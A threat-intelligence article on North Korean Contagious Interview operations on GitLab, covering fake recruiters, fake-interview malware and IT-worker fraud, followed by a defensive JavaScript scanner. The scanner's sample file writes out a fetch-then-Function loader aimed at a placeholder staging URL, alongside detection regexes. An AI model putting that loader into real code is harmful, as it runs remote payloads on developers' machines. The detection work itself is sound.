North Korean nation-state threat actors have been conducting a two-pronged operation in which they embed fictitious employees inside legitimate businesses while posing as recruiters. Since at least 2022, these actors have used the malware families BeaverTail and OtterCookie to deceive software developers into executing malicious code during fictitious technical interviews. This has allowed them to steal credentials, take over devices remotely, and commit identity and financial theft.
Known to the public as Contagious Interview, the campaign has affected thousands of developers and is still expanding. On professional networking sites, the threat actors create believable recruiter profiles and instruct targets to run code that is presented as a technical assessment. Once the victim launches the project, the malware runs silently in the background.
Separate North Korean agents have also infiltrated Western tech firms as phony workers, obtaining salaries that are purportedly used to support the government. In 2025, 131 GitLab.com accounts linked to these North Korean malware distribution campaigns were found and banned by GitLab analysts. With an average of 11 account bans per month, activity peaked in September.
According to analysts, in more than 80% of cases the actors placed a hidden loader that retrieved its payload from outside services such as Vercel rather than storing the malware directly on GitLab, which makes the activity much harder for defenders to detect.
Figure: Distribution of staging infrastructure on GitLab.com for North Korean nation-state malware activity in 2025 (Source: GitLab)
The IT worker scheme's financial scale is equally concerning.
Analysts discovered a private repository that belonged to Kil-Nam Kang, a cell manager who supervised seven North Korean agents working out of Beijing. According to financial records, the cell did freelance software development under stolen or fake identities, earning over US$1.64 million between Q1 2022 and Q3 2025.
Execution of Malware and Strategies for Concealment
In 2025, the most prevalent execution pattern dispersed malicious code across several project files, making it easy to overlook even during a thorough code review.
Under the guise of a standard configuration variable, the threat actors encoded a staging URL inside a .env file.
When the developer executed the project, a trigger function retrieved remote content and passed it to a custom error handler that used JavaScript's Function constructor to run the downloaded payload as live code. The staging URLs provided a further layer of protection against analysis: they returned fake content unless the proper request headers were included.
Figure: Distribution of North Korean nation-state malware features and activity on GitLab.com in 2025 (Source: GitLab)
In December 2025, analysts noticed a new cluster that used VS Code task configurations to execute malware and decoded hidden payloads from phony font files.
Employers should be wary of candidates whose links to code portfolios or professional profiles are broken. During technical screening, developers should refrain from executing unknown code received from unidentified contacts.
Defenders should also watch for encoded values in .env files and for unexpected outbound requests that are triggered at application startup.
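The execution pattern described above (a base64-encoded staging URL in .env, a file that fetches remote content and hands it to the Function constructor) can be pre-screened statically before a take-home project is ever run. The following is an added example, not GitLab's or the article's code; the .env key, the example.com URL and the sample source files are constructed placeholders.

```javascript
// Added example: static pre-screen for the two indicators the article describes.
// Sample inputs are constructed; nothing here contacts the network or runs project code.

const ENV_LINE = /^\s*([A-Z0-9_]+)\s*=\s*["']?([A-Za-z0-9+/]{16,}={0,2})["']?\s*$/;
// An outbound request plus the Function constructor in one file is the loader shape described.
const REQUEST_RE = /\b(fetch|axios|https?\.(get|request))\s*\(/;
const FUNCTION_CTOR_RE = /\b(new\s+)?Function\s*\(/;

// .env values that are base64 and decode to a URL (a staging address disguised as config).
function findEncodedUrls(envText) {
  const hits = [];
  for (const line of envText.split(/\r?\n/)) {
    const m = ENV_LINE.exec(line);
    if (!m) continue;
    const decoded = Buffer.from(m[2], 'base64').toString('utf8');
    if (/^https?:\/\/[\x21-\x7e]+$/.test(decoded)) hits.push({ key: m[1], url: decoded });
  }
  return hits;
}

// True when a source file both performs an outbound request and passes a string to Function().
function looksLikeRemoteLoader(jsSource) {
  return REQUEST_RE.test(jsSource) && FUNCTION_CTOR_RE.test(jsSource);
}

// files: [{ name, text }] as read from the project; returns human-readable findings.
function scanFiles(files) {
  const findings = [];
  for (const f of files) {
    if (/(^|\/)\.env/.test(f.name)) {
      for (const h of findEncodedUrls(f.text)) findings.push(`${f.name}: ${h.key} decodes to ${h.url}`);
    } else if (/\.[cm]?js$/.test(f.name) && looksLikeRemoteLoader(f.text)) {
      findings.push(`${f.name}: fetches remote content and passes a string to Function()`);
    }
  }
  return findings;
}

// Constructed samples: REMOTE_CONFIG is base64 of the placeholder https://example.com/stage;
// config.js mimics the trigger/error-handler shape, app.js is a benign fetch for comparison.
const SAMPLE_FILES = [
  { name: '.env', text: 'NODE_ENV=production\nREMOTE_CONFIG=aHR0cHM6Ly9leGFtcGxlLmNvbS9zdGFnZQ==\n' },
  { name: 'config.js', text: 'const raw = Buffer.from(process.env.REMOTE_CONFIG, "base64").toString();\n' +
      'function onError(b) { return new Function(b)(); }\nfetch(raw).then(r => r.text()).then(onError);\n' },
  { name: 'app.js', text: 'fetch("/api/health").then(r => r.json());\n' },
];

for (const line of scanFiles(SAMPLE_FILES)) console.log(line);
```

To use it on a real project, read each file into the `{ name, text }` shape and pass the list to `scanFiles`; the regexes are heuristics, so treat hits as a reason to review the file by hand rather than as proof of compromise.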